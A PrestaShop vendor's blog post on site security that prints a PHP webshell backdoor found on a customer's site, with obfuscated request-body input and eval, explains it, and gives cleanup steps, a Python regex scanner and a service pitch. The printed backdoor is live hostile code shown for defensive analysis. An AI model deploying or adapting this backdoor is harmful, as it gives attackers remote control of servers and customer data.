
Several must-have industry tools to improve the security of a PrestaShop foreign trade e-commerce website

PrestaShop development history

PrestaShop is an excellent and powerful open source e-commerce platform for foreign trade. We started using PrestaShop in 2009, when it was still at version 0.9: a fresh interface, strong performance, and friendly extensions. It has neither the bulkiness of Magento, nor the age of ZenCart, nor the fragility of OpenCart, so PrestaShop sprang up like bamboo shoots after rain, quickly became popular around the world, and is widely loved by its users. (As for which foreign trade open source e-commerce software is better: PrestaShop, Magento, ZenCart, OpenCart, etc.?) As a new generation of e-commerce solution, PrestaShop is very popular all over the world, with 300,000+ merchants, 1 million+ community users, 1,000+ developers, and 250+ agents.

As PrestaShop continues to grow, we believe that PrestaShop will get better and better:

PrestaShop information security

Thanks to PrestaShop's sound architecture, its security record is still commendable, but because the technical level of the people involved in PrestaShop development is uneven, PrestaShop vulnerabilities have begun to appear. You can search for PrestaShop on Openwall to check its vulnerability information. PrestaShop has now been in development for 11+ years. If you have the technical ability, you are welcome to submit vulnerability information and help build PrestaShop information security together. ZHSoft has been working in the PrestaShop field for 11+ years.

PrestaShop security vulnerabilities explained

A customer reported that there was a file on his website that was always restored no matter how it was modified. Our senior engineers examined his PrestaShop website and found the problem. The PrestaShop Trojan file is as follows:

<?php
session_start();
@set_time_limit(0);
@error_reporting(0);
function E($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $D[$i] = $D[$i]^$K[$i+1&15];
    }
    return $D;
}
function Q($D){
    return base64_encode($D);
}
function O($D){
    return base64_decode($D);
}
function I(){
    return "php://input";
}
$V='user';
$T='12345678';

    $F=O(E(file_get_contents(I()),$T));
    if (isset($_SESSION[$V])){
        $L=$_SESSION[$V];
        $A=explode('|',$L);
        class C{public function nvoke($p) {eval($p."");}}
        $R=new C();
		$R->nvoke($A[0]);
        echo E(run($F),$T);
    }else{
        $_SESSION[$V]=$F;
    }

As can be seen, the core statement of the above Trojan is:

function I(){
    return "php://input";
}

php://input reads the raw body of the incoming HTTP request, so the file accepts data sent from outside. This is what is usually called a remote-control backdoor, which turns the server into a "zombie" host. As long as this Trojan file exists, whatever the customer tries is futile, because the Trojan file can be used to transfer any malicious file to the website remotely, which is extremely harmful.

PrestaShop security vulnerability patch

After analysis by our senior engineers, the solution to the above problem is clear:

  • First, search the entire website for Trojan files and delete them.
  • Then change all server passwords, database passwords, FTP passwords, and website back-office passwords.
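The first step above, searching the whole site for Trojan files, can be partly automated. The following scanner is an added example and not ZHSoft's own tooling: its indicator names, file names and scoring rule are assumptions of this example, with patterns drawn from the sample shown earlier, and the two input files are constructed.

```python
import re
import tempfile
from pathlib import Path

# Heuristic indicators drawn from the sample above; the names are this example's own.
INDICATORS = {
    "raw_request_body": re.compile(r"php://input", re.I),
    "eval_call": re.compile(r"\beval\s*\(", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "xor_with_key_index": re.compile(r"\]\s*\^\s*\$\w+\s*\["),
    "errors_silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
}
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".inc"}


def scan_file(path):
    """Return the sorted names of the indicators present in one file."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_suspicious(hits):
    """Request body plus eval is the decisive pair; otherwise require 3+ hits."""
    return {"raw_request_body", "eval_call"} <= set(hits) or len(hits) >= 3


def scan_tree(root):
    """Walk root and return {relative_path: hits} for suspicious PHP files."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            hits = scan_file(path)
            if is_suspicious(hits):
                findings[path.relative_to(root).as_posix()] = hits
    return findings


def demo():
    """Constructed tree: one file holding fragments of the sample, one benign file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "img").mkdir()
        (root / "img" / "cache.php").write_text(
            '<?php\n@error_reporting(0);\n$D[$i] = $D[$i]^$K[$i+1&15];\n'
            'return "php://input";\neval($p."");\nbase64_decode($D);\n')
        (root / "mail.php").write_text('<?php\n$body = base64_decode($encoded);\n')
        return scan_tree(root)
```

Pattern matching of this kind misses obfuscated variants and can flag legitimate code, so treat hits as candidates for manual review and also compare the site's files against a clean copy of the same PrestaShop release.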

One last point: PrestaShop is now more and more popular, and the technical level of its developers is uneven. It is recommended that you choose a developer with technical strength who supports long-term after-sales service (recommendation: ZHSoft). Do not let the pursuit of small savings damage your own information security, because data is priceless.

Here, I would like to recommend several must-have industry tools to improve the security of a PrestaShop foreign trade e-commerce website:

Use two-step verification to improve account and password security. Even if your account password is leaked or stolen, there is no need to worry: the verification code generated on your hardware smart device is known only to you, so hackers cannot log in to the system.

Google reCAPTCHA is a free service that protects your site from spam and abuse. Using this service can make your website more secure and keep it away from robot attacks, brute-force cracking, simulated submissions, remote registration, spam, etc.

Those are all of our solutions for PrestaShop information security. I hope they will be useful to everyone.

A reminder once more: it is recommended that you choose a developer with technical strength who supports long-term after-sales service (recommendation: ZHSoft). Do not let the pursuit of small bargains damage your own information security, because data is priceless.
